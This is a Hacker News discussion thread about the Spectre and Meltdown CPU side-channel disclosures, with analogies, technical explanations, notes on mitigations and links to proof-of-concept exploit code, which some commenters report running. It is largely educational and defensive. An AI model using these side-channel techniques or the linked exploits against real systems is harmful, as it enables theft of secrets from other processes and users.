Hacker News new | past | comments | ask | show | jobs | submit login
Reading privileged memory with a side-channel (googleprojectzero.blogspot.com)
2334 points by brandon on Jan 3, 2018 | hide | past | favorite | 593 comments



An analogy that was useful for explaining part of this to my (non-technical) father. Maybe others will find it helpful as well.

Imagine that you want to know whether someone has checked out a particular library book. The library refuses to give you access to their records and does not keep a slip inside the front cover. You can only see the record of which books you have checked out.

What you do is follow the person of interest into the library whenever they return a book. You then ask the librarian for a copy of the books you want to know whether the person has checked out. If the librarian looks down and says "You are in luck, I have a copy right here!" then you know the person had checked out that book. If the librarian has to go look in the stacks and comes back 5 minutes later with the book, you know that the person didn't check out that book (this time).

The way to make the library secure against this kind of attack is to require that all books be reshelved before they can be lent out again, unless the current borrower is requesting an extension.

There are many other ways to use the behavior of the librarian and the time it takes to retrieve a book to figure out which books a person is reading.

edit: A closer variant. Call the library pretending to be the person and ask for a book to be put on hold. Then watch how long it takes them in the library. If they got that book they will be in and out in a minute (and perhaps a bit confused), if they didn't take that book it will take 5 minutes.


Your analogy is more apt for side-channel attacks in general. Here is a more specific version for Meltdown:

A library has two rooms, one for general books and one for restricted books. The restricted books are not allowed out of the library, and no notes or recordings are allowed to be taken out of the restricted room.

An attacker wants to sneak information out of the restricted room. To do this the pick up a pile of non-restricted books and go into the restricted room. Depending on what they read in there they rearrange the pile of non-restricted books into a particular order. A guard comes along and sees them, they are thrown out of the restricted room and their pile of non-restricted books is put on the issue desk ready to be put back into circulation.

Their conspirator looks at the order of the books on the issue desk and decodes a piece of information about the book in the restricted room. They repeat this process about 500000 times a second until they have transcribed the secret book.


I don't understand this explanation :/ Why is the room considered restricted if you can go inside? Do I know how all books that exist in the library? How does the order of the thrown out books pertain to the secret book?


> Why is the room considered restricted if you can go inside?

That's the bug. The guard only checks to see whether you're supposed to have access after you walk in and start (speculatively) rearranging books. One way to fix this bug would be to have the guard check your access at the door.


What is the analogy behind being able to go into the restricted room?


The restricted room is the part of the machine behind the protection. Memory reads are not checked at the tine access. They are checked when the instruction retires.


On intel* this isn’t a property intrinsic to superscalar processors, other architectures check it in flight or while it’s in the issue queue, preventing this side channel.


You can call into the kernel.

edit: s/call into/trigger a syscall/


You don't even need to do that for meltdown.


I don't understand how this info can be used for getting what was inside the book? If my understanding of your explanation is correct, book name is analogous to memory address. When the victim (legit process) returned the book with name X (called free on the mem block X), the librarian (OS) erased all pages of the book and repurposed it for printing another book before handing it out to the evil dude(snoopy process).


My attempt, assuming that the books only contain one character each:

The librarian has a list of books you're not allowed to take out. You request one of those books (book X), but it takes a while for search to run to see whether you're allowed to or not. While you're waiting, you say "actually, I'm not really interested in taking out book X, but if the content of that book is 'a', I'd like to take out book Y. If the content of that book is 'b', I'd like to take out book Y+1, and so on".

The librarian is still waiting for the search to complete to see if you can take out book X, but doesn't have anything better to do, so looks inside it, sees that the letter is 'b', and goes and gets book Y+1 so she can hand it over to you.

Now, the original check to see if you can take the first book out completes, and the librarian says "I'm sorry, I can't let you have book X, and I can't give you the book I fetched that you are allowed to take out, otherwise you'd know the content of the forbidden book."

Now, you request book 'Y', which you are allowed. The librarian goes away for a few minutes, and returns with book 'Y', and hands it over to you. You request book 'Y+1', and she hands it over immediately. You request book 'Y+2', and she goes away for a few minutes again, and hands it over.

You now know that Y+1 was (probably) the book she fetched when you made the forbidden request, and therefore that the letter inside the forbidden book was 'b'.


Great explanation - thank you. One thing I don’t understand is how this can be exploited from javascript. Does it have timing primitives so fine it can tell the difference between a memory lookup served from memory va from cache?


Yes it does because javascript execution has had to become very fast. Fast means you can run a very tight loop that updates a counter to create a fairly high-resolution clock.


What I don't understand is how the branch predictor is even exploitable from JavaScript -- it doesn't have pointers. How can it "request" arbitrary memory locations and time the results?


It has byte arrays and indexing on those which is equivalent to having pointers. See page 6 and 7 of the Spectre paper.


So the mid-term fix for js jits should be to gimp indexed array access to the point where an out of bounds index value can never enter speculative execution, right? I'm no expert in these low-level things, but I imagine that speculative execution happens only from conditional jumps and that alternative bounds assurances (e.g. using base+idx%len as the eventually address or limiting it to a sandbox-owned region using a few bitmasks) should be possible that reliably stall the pipeline without allowing speculative access (obviously at considerable performance cost, but the jit should be able to whitelist certain safe access patterns and/or trusted code sources to not let this get out of hand). Am I missing something?


I believe they made their own "good enough" clock out of a loop in a webworker.


Thanks, this was a great explanation, really simplified it!


I understood with your explanation, thanks!


The person checking out the book is a program, so they aren't the brightest.

They check out the book called "how to go to facebook.com". Then they check out "how to type a password". Then they check out "Typing '1234' for Dummies".

I bet you'll never figure out how to get into their facebook account.


Fantastic explanation of cache timing attacks. This morning I was explaining spectre to non-technical people and let me tell you, "leaking L1 CPU cache memory," is a real party starter. So I'm using there librarian example going forward.


I used your explanation in a longer note, "Spectre: How do side-channel attacks work?"[^1] to try and explain how side-channel attacks work (partly to myself, and partly to non-hackers).

[^note]: https://www.facebook.com/notes/petrus-theron/spectre-how-do-...


Thanks for the heads up!


Thank you for this. Would you say this applies to both Spectre and Meltdown, or one and not the other?


This is a general explanation of side channel attacks, as I understand.


yeah, I don't think it is a perfect analogy for Meltdown, I'll try one, someone correct me if I'm misunderstanding Meltdown.

Let's say you want to know if your boss is away on vacation next week so you call their admin and say "you need to double-check my contact info if the boss is going to be out next week". They load up the boss' calendar to check and based on his presence next week then load up your info. Only once done, do they take the time to remember the boss didn't want you to know wether they are in or out. So you hear back, "sorry, can't tell you that, but you follow up with "OK, well can you still double check that my phone number is..."

If they respond quickly with a yes, then your file is still on their screen and the boss is in fact out next week. If there is a short pause while they look it up, then the opposite.


A timing attack is one type of side channel attack. These types of timing attacks can also be used against poor/unsuitable crypto functions, or even some processes involving general computation e.g. If it takes longer to reject input A than input B, you can reason that input A is closer to the answer (similar to someone reading a paragraph until they reach the first error).

Other side-channel attacks can come in the form of analysing network data, power-consumption (CPUs use more power when they are "busier")... even noise (listen for when the fans start spinning up).


Is blinding the only real solution to most of these attacks against Crypto?


Yes, this is a general explanation of side channel attacks against some kind of caching. The more specific example tries to be closer to the type of situation that happens in Spectre, but it is not a direct analogy.


Papers describing each attack:

https://meltdownattack.com/meltdown.pdf

https://spectreattack.com/spectre.pdf

From the spectre paper:

>As a proof-of-concept, JavaScript code was written that, when run in the Google Chrome browser, allows JavaScript to read private memory from the process in which it runs (cf. Listing 2).

Scary stuff.


"Meltdown" is an Intel bug.

"Spectre" is very bad news and affects all modern CPUs. Mitigation is to insert mfence instructions throughout jit generated sandboxed code making it very slow, ugh. Otherwise assume that the entire process with jit generated code is open to reading by that code.

Any system which keeps data from multiple customers (or whatever) in the same process is going to be highly vulnerable.


> Mitigation is to insert mfence instructions throughout jit generated sandboxed code making it very slow, ugh.

Here's the synchronized announcement from Chrome/Chromium: https://sites.google.com/a/chromium.org/dev/Home/chromium-se...

"Chrome's JavaScript engine, V8, will include mitigations starting with Chrome 64, which will be released on or around January 23rd 2018. Future Chrome releases will include additional mitigations and hardening measures which will further reduce the impact of this class of attack. The mitigations may incur a performance penalty."

Chrome 64 will be hitting stable this month, which means that it ought to be possible to benchmark the performance penalty via testing in Chrome beta. Anybody tried yet?


The mitigations are to disable SharedArrayBuffer and severely round performance.now(). Not good that there aren’t other less intrusive ways to mitigate.


I don't get the impression that those are the full extent of the changes though; I think those two were called out only because they're API changes rather than implementation details. Haven't checked the code so I could be wrong, of course.


A little bit more info can be found here [1]. In particular, site isolation [2] will also assist in protecting against this vulnerability.

[1] https://support.google.com/faqs/answer/7622138#chrome [2] http://www.chromium.org/Home/chromium-security/site-isolatio...


Would it be practical to run each javascript VM in it's own sandbox?

Edit: Apparently you can already do something like this. Seems to be an option for Chrome starting with 63. (Which was an October release I believe?

http://www.chromium.org/Home/chromium-security/site-isolatio...


That can't be right because they already round performance.now() so the Spectre attack didn't use it (it instead used a webworker with a tight-loop incrementing a counter)


the tight loop iteration used a shared array buffer to provide a high resolution timer, specifically to deal with the obvious fix of truncating precision of performance.now().

The reason for /further/ truncating performance.now() is that the relative cost in this attack means that you don't need as much precision as was needed for the original (page table? I think) attack.

A SAB timer just needs to increment a counter in one thread and read it in the host thread and the granularity is however long it takes to get through a for-loop.


Thanks, I missed how important SAB was to their webworker timer.


> ...severely round performance.now().

This sucks, and is a side-effect that I didn't even think about. I guess it's probably pretty effective, but it will make benchmarking a lot harder, since you'll probably now have to do a lot more runs.


If it was a big issue you can always introduce a 'benchmark mode' switch that allows you to put resolution back into the counter when you want to run a benchmark. Display a 'WARNING BROWSER INSECURE IN THIS MODE' banner for good measure.


Doubt that. The Firefox news said they will round to 20 us.

That's much more accurate than necessary to benchmark any software code.


Those are the mitigations firefox is doing. Is chrome doing the same?


For some reason, performance.now() and even the performance profiler are capped at 1 milisecond precision on my machine, which make both pretty much useles. Can only get better for me. :|


From the article it seems that is not 100% sure AMD and ARM are not affected by metldown, only that they could not trigger the issue, but authors mention this

"However, for both ARM and AMD, the toy example as described in Section 3 works reliably, indicating that out-of-order execution generally occurs and instructions past illegal memory accesses are also performed."


I would think that any sane implementation would not transmit privileged data to waiting instructions.

Look at their Listing 2: Instructions 5 - 7 will be waiting for the privileged data from line 4 (they are not speculatively executed since they have a data dependency on line 4).

So why is Intel releasing the privileged data to the waiting instructions? An answer could be that violation checking is delayed until retire, but other implementations are possible.

Anyway, so it could be that AMD and ARM are vulnerable, but it's possible that they are not.


There are two different issues.

1. Intel only (so far) is related to prefetching privileged memory 2. More or less everyone: Speculatively executing code that has variable execution time.


> I would think that any sane implementation would not transmit privileged data to waiting instructions.

The point of VIPT caches is exactly to use data before all the checks are completed.

It's easy to judge the sanity of things ex post, but maybe it's not that easy if it took 20 years to find the issue.


I don't believe for a second that nobody came up with this idea before. I believe that nobody until now had the motivation to spend the time actually trying to confirm that it's a problem by developing a PoC. Most people would have given up on the idea simply because CPU vendors are not expected to make such a fundamental mistake.


The mistake is clear from the design - thats why all CPU vendors are vulnerable to variants of the same bugs.

Previously side channel attacks like this have been seen by the security community as unreliable things which only work in very specific cases and have to be averaged over millions of runs.

This attack shows a side channel which is general purpose, reliable, and fast.


> The mistake is clear from the design

There is no fundamental reason why speculative instructions should be allowed to mutate the cache.

OTOH the contention-based side channel attack on speculation has been public knowledge for over a decade. [1]

[1] Z. Wang and R. B. Lee, "Covert and Side Channels Due to Processor Architecture," 2006 22nd Annual Computer Security Applications Conference (ACSAC'06), Miami Beach, FL, 2006, pp. 473-482. doi: 10.1109/ACSAC.2006.20


> There is no fundamental reason why speculative instructions should be allowed to mutate the cache.

There is: hundreds of instructions can be in flight speculatively at the same time, especially if you take hyperthreading into account. Good luck rolling them all back.

The question is not whether the cache should be mutated during speculative execution. It's what kinds of speculative execution are allowed, and in some cases it's not even clear if fences should be placed by the programmer (whack-a-mole style), the compiler (not sure how) or the processor (probably not). It's non-obvious enough that how to solve it is to some extent a research problem.


About Meltdown, it was well known since even before that speculative execution has to stop at security boundaries.


> Mitigation is to insert mfence instructions throughout jit generated sandboxed code making it very slow, ugh. Otherwise assume that the entire process with jit generated code is open to reading by that code.

It seems like keeping untrusted code in a separate address space would be a suitable workaround? A lot of comments here seem to be implying that meltdown-style reading of separate address spaces is possible via Spectre, and my read is that it wouldn't.


No, the Spectre paper discusses cross-process attacks too. First, you use BTB poisoning to coerce the victim process to branch-mispredict to code of your choice (a "gadget"). You can get that code to load memory of your choice, which can be the code of shared libraries (which are usually loaded only once into physical memory for all processes). Then you can do timing attacks using the last-level cache to determine whether that memory is in cache.

It's certainly not easy, but it's doable.


This is mitigatable if the attacker process can't send a memory address to the victim process, right? Even if you can poke at the memory for cache prediciton misses, if you can't control what the victim process accesses, it seems harder to exploit.

We're all talking about how Spectre is this magic "get access to any memory from any process". But it looks to me like it's a new class of attack, that still requires specific entry points for the software you're trying to attack.

I'd like to be proven wrong on this, but it _feels_ like this is more of a software thing like other timing bugs. In theory you can write software that isn't vulnerable

EDIT: my reading of the "JS Spectre implementation" is "JIT code runs in the process of the browser + you can write JS code to read the process's own memory". I can imagine messiness with extensions (1Password in particular).


I don't think so. My understanding from the paper is that you don't need to explicitly send a memory address to the victim, you just need a way to communicate with it (e.g. via a socket or some other API) in a way that causes it to do a branch.

Before you trigger the victim process, you perform some steps in your own, hostile, process that teaches the branch predictor where a particular branching operation will likely go. Then you trigger the victim process in the way you know will cause a very similar branching operation.

Even though it's operating within an entirely different process, the branch predictor uses what it learnt in the hostile process to predict the branch result in the victim process. It jumps to the address the hostile process taught it, and starts to speculatively execute code there. Eventually, it figures out it guessed wrong, but by then it's too late, and the information has leaked via a side-channel in a way that the hostile process can detect.

So, essentially, you're use the branch predictor's cache to send the memory address. And you're not sending it to the victim process, you're sending it directly to the CPU. The victim process will never even know it's been attacked, because when the branch predictor hides the consequences of its incorrect guess from being detected by conventional means.


this still seems off to me.

I get that the victim process' branch prediction can be messed with. But if my victim process is:

   password = "password"
   secret = "magic BTC wallet secret key"
   while True:
       password_attempt = input()
       if constant_time_compare(password, password_attempt):
           print(secret)
And my input is something like:

   result = ""
   while sys.stdin.peek() not in ['\n', EOF]:
      result += sys.stdin.get()
Then at no point is the victim program really exposing any pointer logic, so not even the victim process will be accessing the `secret` during execution, let alone the hostile process.

The examples given all include arrays provided by the hostile program, and some indexing into the arrays. I definitely see this being an issue in syscalls, but if that's the scope of this, I wouldn't call Spectre a "hardware bug" any more than other timing attacks would be hardware bugs.


The victim code doesn't need to have some explicit pointer arithmetic, it just has to have some sequence of bytes, somewhere in its address space (the "gadget"), that can be used to read a memory address based on a value stored in a register that can be affected by input supplied from the hostile process. The branch prediction is used to speculatively execute that code. The "Example Implementation on Windows" section in the Spectre paper goes into more detail about this.


After skimming the articles it sounds like a lot hinges on just how hard Spectre is to pull off in practice/in the wild. Anyone have any insights on that?


I don't know much about this particular flaw, but I imagine it'll be pretty hard until someone releases an exploit kit, and then pretty easy after that.


It's an arms race, there will always be new ways of exploiting this flaw in unexpected ways unless speculation is disabled entirely on existing CPUs.


They say they can reliably read memory around 120kB/s with one vulnerability and 1kB/s with the other. It just works, all the time. Some of the PoC takes a few minutes to initialize.

I'd say difficulty level is easy.


However, only one of the PoCs runs on AMD, and that doesn't cross process boundaries.

So how easy is it to turn that PoC into something I should worry about? Seems like browsers are the most affected by this scenario, but that also means harden the browser (separate process per page) and it might be difficult to exploit.


As a general rule of thumb, if everyone already has a PoC, you should assume someone has been doing targeted practical attacks for a while.


Difficulty to exploit is easy once you have the exploit running. Writing a new exploit is really hard, otherwise we wouldn't be starting 2018 with these news.


It doesn't look that hard, and in any case, we will suffer the mitigation consequences either way.


Worse, no mitigation will ever be complete against Spectre, unless flat out disabling speculation across memory loads.


With the right new instructions inserted at the right place, assisted by a good type system, and a processor that does not share its resources like crazy in highly uncontrolled ways, this seems fixable.

Sadly, I feel the only part that won't happen will be the programming language part, but who knows.


it isn't. There have been a few PoC referenced on twitter, and the spectre paper itself reference a PoC in browser hosted javascript (e.g. random ad can scan memory)

it's obviously not a free + zero time activity, but I'm going to assume someone making an ad to scan memory isn't super concerned about end user cpu usage or battery life..


"Spectre" is very bad news and affects all modern CPUs

It's not yet clear whether it affects all modern CPUs, notably I have yet to see any mention of modern POWER/MIPS/SPARC-based designs. If someone has pointers, those particular cases would probably be quite interesting.


https://access.redhat.com/security/vulnerabilities/speculati...

Additional exploits for other architectures are also known to exist. These include IBM System Z, POWER8 (Big Endian and Little Endian), and POWER9 (Little Endian).


It affects CPUs that do speculative execution. Pretty sure some powers do.


I wonder to what degree some systems are affected. I believe Solaris already uses separate address spaces on SPARC for user and kernel. I haven’t looked over the SPARC architecture manual to see if they allow speculative execution beyond privilege boundaries.


That only prevent reading over higher privilege (the meltdown vulnerability) it doesn't protect the arbitrary user land reads from spectre.


I've thrown the C code in the Spectre paper up if anyone wants to feel the magic: https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9...


Just tested this on systems of varying age.

Works on processors going back as far as 2007 (the oldest I have access to now is an Athlon 64 X2 6000+), but the example code relies on an instruction that the Atom D510 does not suport.

Because Spectre seems to be an intrinsic problem with out-of-order execution, which is almost as old as the FDIV bug in intel processors, I would be very surprised if the Atom D510 did not turn out to be susceptible using other methods as outlined in the paper.

EDIT: I originally suspected this instruction was CLFLUSH and erroneously claimed the D510 doesn't support sse2. It does support sse2, so it must be that it does not support the RDTSCP instruction used for timing.

EDIT: This gets very interesting. I made some modifications to use a CPUID followed by RDTSC, which now runs without illegal instructions and works everywhere the previous version worked. Except on the D510, this runs but I cannot get the leak to happen despite exploring values of CACHE_HIT_THRESHOLD. Could the Atom D510 really be immune from Spectre?


The D510 might not have speculative execution. https://en.wikipedia.org/wiki/Bonnell_(microarchitecture)


Certain Atom CPUs have no speculative execution nor OoO execution.


Thanks for this. Would love an annotated version of this if anyone is up for it. My C is pretty good, but some high level "what is being done here" and "this is what shouldn't work" comments would be cool to see.


Worked on a Intel(R) Celeron(R) CPU 847 @ 1.10GHz.

With "gcc (GCC) 7.2.1 20171128", remove the parenthesis from CACHE_HIT_THRESHOLD macro[1] to compile correctly.

[1]: https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9...


Worked on my system.

(Set cache_hit_threshold to the default value of 80, my cpu is an Intel i7-6700k.)


I thought it was supposed to be exploitable by javascript? If you can get to the machine and run c code, well, that doesn't seem like an exploit?


At its core both vulnerabilities are essentially local privilege escalation bugs (i.e. a random process can read e.g. secret keys from another process), but that still is a very important exploit - if I can run unprivileged C code on e.g. AWS and are able to read the memory of someone else running on the same shared machine, that's really bad.

The Javascript case is the main one that makes it remotely exploitable.


My understanding is it's anything that can make a running process mis-train the CPU core and read the values back. Consider, for example, shared hosts without separate process pools, running code from different users with the same interpreter processes.


Just because it runs in a C PoC does not mean it only runs in C.


From the Spectre whitepaper:

> In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it.

The whitepaper doesn't contain example JS code however


This whitepaper describes the Javascript exploit in Section IV. I'm struggling to understand it though: http://www.cs.vu.nl/~herbertb/download/papers/anc_ndss17.pdf


This too was provided as a proof of concept (without explanation): https://brainsmoke.github.io/misc/slicepattern.html. I'm not sure what I'm looking at though


This is the first implementation in Javascript I have seen so far: http://xlab.tencent.com/special/spectre/js/check.js


At its core both vulnerabilities are essentially privilege escalation bugs (i.e. a random process can read e.g. secret keys from another process), but the Javascript case is the one that makes it remotely exploitable.


It is.


Work's on Intel® Core™2 Duo Processor T7200. Had to replace __rdtscp(&junk) with __rdtsc(), the Core 2 doesn't have the former.


Works on MacOS 10.13.2.

Looking back, the Mac patches were to address KPTI (Meltdown) which is separate to Spectre.


Terrifyingly, this seems to work on a DigitalOcean droplet. I'm assuming this means people could potentially read memory from other VMs on the same system, albeit with a great deal of difficulty.


So... it reads a string that was declared at the top of the file?


I think this means we should consider all browser processes to be completely insecure, until mitigations are applied (e.g. Chrome's Site Isolation: https://www.chromium.org/Home/chromium-security/ssca).

Looks like any session token/state could be exfiltrated from your Gmail tab to a malicious JS app running in-process, for example.

Am I overreacting here?


> Am I overreacting here?

Still skimming the paper, but the JS attack appears to be processor-intensive (please chime in if you interpret it differently!). Any widespread, indiscriminate use of such an attack in the wild seems like it would eventually be detected as surely as client-side cryptocurrency mining was discovered. If you aren't a valuable target, if you don't visit sites that are shady enough to discreetly mine bitcoin in your browser, and if you use an adblocker to defang rogue advertisers, then you probably shouldn't lose too much sleep over this (which is not intended to diminish how awesome (in the biblical sense) this attack is).

That said, if there were ever a time to consider installing NoScript, now's it: https://addons.mozilla.org/en-US/firefox/addon/noscript/


And if you're a web developer, now it the good moment to make sure your site works correctly when JS is disabled.


We'll have to dig a time machine out and go back to 1998 then.

I'm being a facetious ass. But you know I'm not wrong, either.


You are wrong. Install the NoScript extension and you can see your site without js. NoScript also allows you to selectively enable js per site on a temporary or permanent basis. This is the default way that I and many other people browse the web.

https://noscript.net/


Just looking around, general available figures for public internet (as opposed to tor) suggest that anywhere between 0.1% to 1.0% of users have JS disabled. These numbers have also been consistently going down over time. That's a fairly small number to dictate how a system should be designed.


That depends on your target demographic. JS is more frequently disabled among tech-literate customers, so a cloud provider's home page would probably benefit from working without JS.


> These numbers have also been consistently going down over time.

That trend might reverse if vulnerabilities like these continue to surface.


Right. It’s like designing for any other tiny group: color blind, blind, people who don’t read any of the 3 languages your site is already translated to, etc.

I’m not saying that shouldn’t be done, but business wise its probably usually best to instead add design changes for the latest smartphone screen.

The web isn’t a hypertext graph anymore, it’s a large JavaScript program with a thin html front now.


I think you’re misunderstanding. The person you’re replying to wasn’t saying you couldn’t disable JavaScript. They are saying the websites they and many in the industry develop won’t work like that and haven’t since the turn of the century. That’s what they were claiming to be not wrong about, and they aren’t. Turning on NoScript shows the problem but doesn’t solve it.


"Turn of the century"? JS was used for little more than swapping images on mouseover and changing/"animating" title bar text back then. The "you will see absolutely nothing or a ream of {{blah}} text" without js enabled really only became prevalent in the last 5-or-so years. Even in the halcyon days of jQuery usage you could get around quite comfortably without js, as js was still being used to augment webpages rather than replace them entirely.


It wasn't common practice, but fully Javascript rendered applications were a thing as early as 2001. That was when my company developed the first one that I know of. It was a godawful ugly pig but it worked.

Most sites did nothing like that, but they did use Javascript and would break in various ways without it. At that time, there were a lot of people admonishing web developers to test their applications with Javascript disabled. Sort of like now.

ETA: I had to look it up - XHR was first available in IE 5 as an ActiveX control. The internet at large couldn't really expect it to be available but I believe that is where we first used it.

Initial release: March 18, 1999; 18 years ago


Before XHR, there was an iframe trick that could be used to the same effect. We were abusing that to do streaming updates (stalling requests until the server had new data) on then likes of IE5 back in 2004. WebSocket eat your heart out! :-)


I'm not denying that the technology was sort of there (especially/only if you were writing a corporate app that targeted one and only one browser, probably as a replacement for an in-house VB/WinForms app). My point, which you mostly reinforced, was that it was not at all common for a user opting not to enable javascript to see a completely broken public-facing site until relatively recently.


That doesn't make the effort required of a developer to remove an existing JS dependency any easier, though, other than allowing them to see how the site breaks which can already be done using the F12 dev tools.

A lot of sites rely on JS to function even at a basic level these days and I think the parent was saying it's unlikely that that's going to change.


As a developer, it's even easier to test without Javascript: open Chrome Developer Tools, select Settings from the hamburger menu, and check "Disable Javascript".

As the other comments point out, though, the biggest problem is that this is economically irrational for most site owners. The figures on JS-disabled usage I had when I was still at Google (3+ years ago now) were at the lower end of TikiTDO's range. It generally doesn't make economic sense to spend developer time on an experience used by 0.1% of users, particularly if this requires compromises for the 99.9% of users who do have JS enabled.


Culling all that JS can make things faster for everyone.

If you have a web app there’s no point, but if you’re displaying text and images and your site doesn’t work without JS, you’ve over-egged a solved problem.

(... While increasing perceived latency, especially for mobile users.)


I'd bet a certain percentage of THOSE were actually lynx/links/elinks users rather than no script users.


you are better off with uMatrix which gives the user significantly more control on what loads/executed: https://github.com/gorhill/uMatrix

(it's the more advanced version of uBlock, from the same dev)


The old NoScript. The new WebExtension compatible version just blocks, it has no way to disable js.


I browse with NoScript and quite a lot of the web works just fine, in fact. I can selectively enable JavaScript for sites that need it, and that I trust.


Why was this downvoted? This is clearly true. I am in fact doing it right now. I am sitting in an airport and clicked around 20 different comment sections and articles from HN so that I could read them later. None of them gave any issues. The only js that I decided to allow was from HN so that I could expand/hide comments.

Does this mean that all websites work? Of course not. But this allows the user to choose which sites to allow to run js. I'm not going to pretend that this is an easy task for non-technical users, but we should be promoting these kinds of habits, not scoffing at them. We should educate as many users as possible that they can still (for now) control much of the web-based code executing on their machines.


Well it's a severe case of confirmation bias. The people I know that uses NoScript like tools white list sites and third parties, that makes it seem like it works better than it really does. Further more they choose not to visit sites that work poorly. All the problems are visible as a new user, sure it's obviously possible to use NoScript but I need to white list too many sites to be able to say it actually works.


Some sites like NYT wouldn't even render text (!) for me by default with noscript on.

Then there was that time when I read on HN about Forbes loading 35 MB worth of crap (lots of JS too) when you first access it, sure enough it's completely broken with noscript too if you don't allow it.


Yes please!

Long live progressive enhancement and graceful degradation.

At least until we get a JS interpreter with proper permission controls and sandbox limits. Something closer to how Lua is embedded sounds nice.


It seems like practical attacks rely on having a reasonably precise timer available. The spectre paper uses SharedArrayBuffer to synthesize a timer, which is a recent and obscure feature:

https://groups.google.com/a/chromium.org/forum/#!topic/blink...

https://groups.google.com/forum/#!topic/mozilla.dev.platform...

Chrome and Firefox's "intent to ship" posts both contain claims to the effect that there probably aren't any really serious timing channel attacks, which... seems to have been disproved. Why isn't SharedArrayBuffer already being disabled as a stopgap? I think users can turn it off in firefox, how about Chrome?


SharedArrayBuffer will be disabled by default as a stopgap:

https://blog.mozilla.org/security/2018/01/03/mitigations-lan...

performance.now() accuracy is also being reduced.


> I think users can turn it off in firefox, how about Chrome?

This month's stable Chrome release will be outright disabling SharedArrayBuffer until additional mitigations are enacted.


Which sucks for people who've built sites which rely on it.

It isn't exactly polyfillable.


That shouldn't be that many sites. It only hit Chrome stable in July 2017; Firefox in August 2017; and Edge November 2017.


I believe SAB is being disabled, and apparently precision of performance.now() as well? (based on other comments)


about:config javascript.options.shared_memory in Firefox.


Turned off by default for me in 57.0.3/macOS. Is it usually on by default on other platforms?


Just checked on Windows and it was on by default for me for Firefox 57.0.3


Doesn't each tab run in a separate process?


That's true to first approximation in Chrome, but apparently not always.

This recent article contains a bit more detail on Site Isolation: https://arstechnica.com/gadgets/2017/12/chrome-63-offers-eve...

> Chrome's default model is, approximately, to use one process per tab. This more or less ensures that unrelated sites are kept in separate processes, but there are nuances to this set-up. Pages share a process if they are related through, for example, one opening another with JavaScript or iframes embedding (wherein one page is included as content within another page). Over the course of a single browsing session, one tab may be used to visit multiple different domains; they'll all potentially be opened within a single process. On top of this, if there are already too many Chrome processes running, Chrome will start opening new pages within existing processes, resulting in even unrelated pages sharing a process.

Which suggests there are a number of cases where multiple tabs could share a process.


Note that it's not just tabs sharing processes that's an issue: prior to the site isolation work, any iframe in the same page would always be in the same process as the main frame. With site isolation, it's possible to host cross-site [1] iframes in a separate process.

[1] Two pages are considered cross-site if they cannot use document.domain to become same origin. In practice, this means that the effective TLD + 1 component match.


Chrome starts putting multiple tabs in the same process once certain resource thresholds are reached. There's an experimental "site isolation" option that you can toggle on to enforce this better, currently with some caveats: https://www.chromium.org/Home/chromium-security/site-isolati... .

Curious to know whether Firefox has anything similar in the pipe, since it uses a fixed number of content processes rather than a variable number of processes.



This is so incredibly bad. Spectre is basically unpatchable. We can do better than we are now with patches but it's all just turd polishing, essentially. A proper fix will require new CPU hardware. And as a kicker? Leaks are basically undetectable.


New CPU microcode is enough, though at a performance price. On pre-Zen AMD there is also a chicken bit to disable indirect branch prediction. (It feels good to be finally able to speak about this freely!!!)

I don't know for which processors Intel and AMD plan to release microcode updates.


> New CPU microcode is enough

What would that entail? Disabling speculation completely? Disabling memory accesses during speculation?


Disabling indirect branch prediction (and thus speculation after indirect branches) while in kernel mode, or flushing the indirect branch predictor on kernel mode entry. Both need OS support in addition to the microcode, but the change is less invasive than PTI.


That only fixes one variant of Spectre, and only for code running in kernel mode.

The "out of bounds" Spectre variant is still feasible.

Also: What about hyperthreads? It seems to be many people's assumption that the BTB is shared within a physical core.


The out of bounds variant is fixable in the OS, just add a fence instruction between the check and the load.

For code running in user mode, you flush the branch predictor on each context switch---again, new microcode + patched OS.

Hyperthreads are tricky. Those are not yet fixed by microcode AIUI, and in the future you may want a usermode program to say "I don't want indirect branch prediction because I am afraid of what the other hyperthread might do to me". That would require some new system call (like a new prctl on Linux) or something like that.


Great. Now we just have to think of new attacks using the same general idea to slow down all computers by yet another 10% :p


Wouldn't that be a serious performance hit?


It is. Same ballpark as PTI on microbenchmarks, but a little better on macrobenchmarks.


Getting flashbacks of brainsmoke's JS PoC: https://youtu.be/ewe3-mUku94?t=1766

Edit: Also, PoCs for unpatched Windows by pwnallthethings: https://github.com/turbo/KPTI-PoC-Collection


I do also wonder if some speculative prediction / branching stuff can be controlled through undocumented CPU instructions: https://www.youtube.com/watch?v=KrksBdWcZgQ



"As a proof-of-concept, JavaScript code was written that, when run in the Google Chrome browser, allows JavaScript to read private memory from the process in which it runs"

I am not sure what "the process in which it runs" means here ... do they mean private memory from within chrome ? Or within the child process spawned from chrome, or within the spawned JS sandbox or ... what ?

Practically speaking, I worry about a browser pageview that can read memory from my terminal process. Or from my 'screen' or 'sshd' process.

I think that is not a risk here, yes ?


Will it be nontrivial to detect or at least identify these types of exploits as they occur in the wild? Can protection software see these when they happen, assuming a best case scenario where the attack is carried out but doesn't specifically use these methods to hide or disable detection? Is there a general sense yet of whether this exploit is already being leveraged?


Thanks for the links. As an undergrad with limited knowledge of this subject, I would love to see these annotated on Fermat's Library (https://fermatslibrary.com)


Guys, can't we just detect a program doing spectre-like behavior and just kill it instead of having every other application suffer a performance hit by the proposed changes? Antivirus software already does similar stuff


"AMD chips are affected by some but not all of the vulnerabilities. AMD said that there is a "near zero risk to AMD processors at this time." British chipmaker ARM told news site Axios prior to this report that some of its processors, including its Cortex-A chips, are affected."

- http://www.zdnet.com/article/security-flaws-affect-every-int...

* Edit:

From https://meltdownattack.com/

Which systems are affected by Meltdown?

"Desktop, Laptop, and Cloud computers may be affected by Meltdown. More technically, every Intel processor which implements out-of-order execution is potentially affected, which is effectively every processor since 1995 (except Intel Itanium and Intel Atom before 2013). We successfully tested Meltdown on Intel processor generations released as early as 2011. Currently, we have only verified Meltdown on Intel processors. At the moment, it is unclear whether ARM and AMD processors are also affected by Meltdown.

Which systems are affected by Spectre?

Almost every system is affected by Spectre: Desktops, Laptops, Cloud Servers, as well as Smartphones. More specifically, all modern processors capable of keeping many instructions in flight are potentially vulnerable. In particular, we have verified Spectre on Intel, AMD, and ARM processors."


Looks like everyone is vulnerable to arbitrary user memory reads, while Intel and ARM are vulnerable to arbitrary kernel memory reads as well.


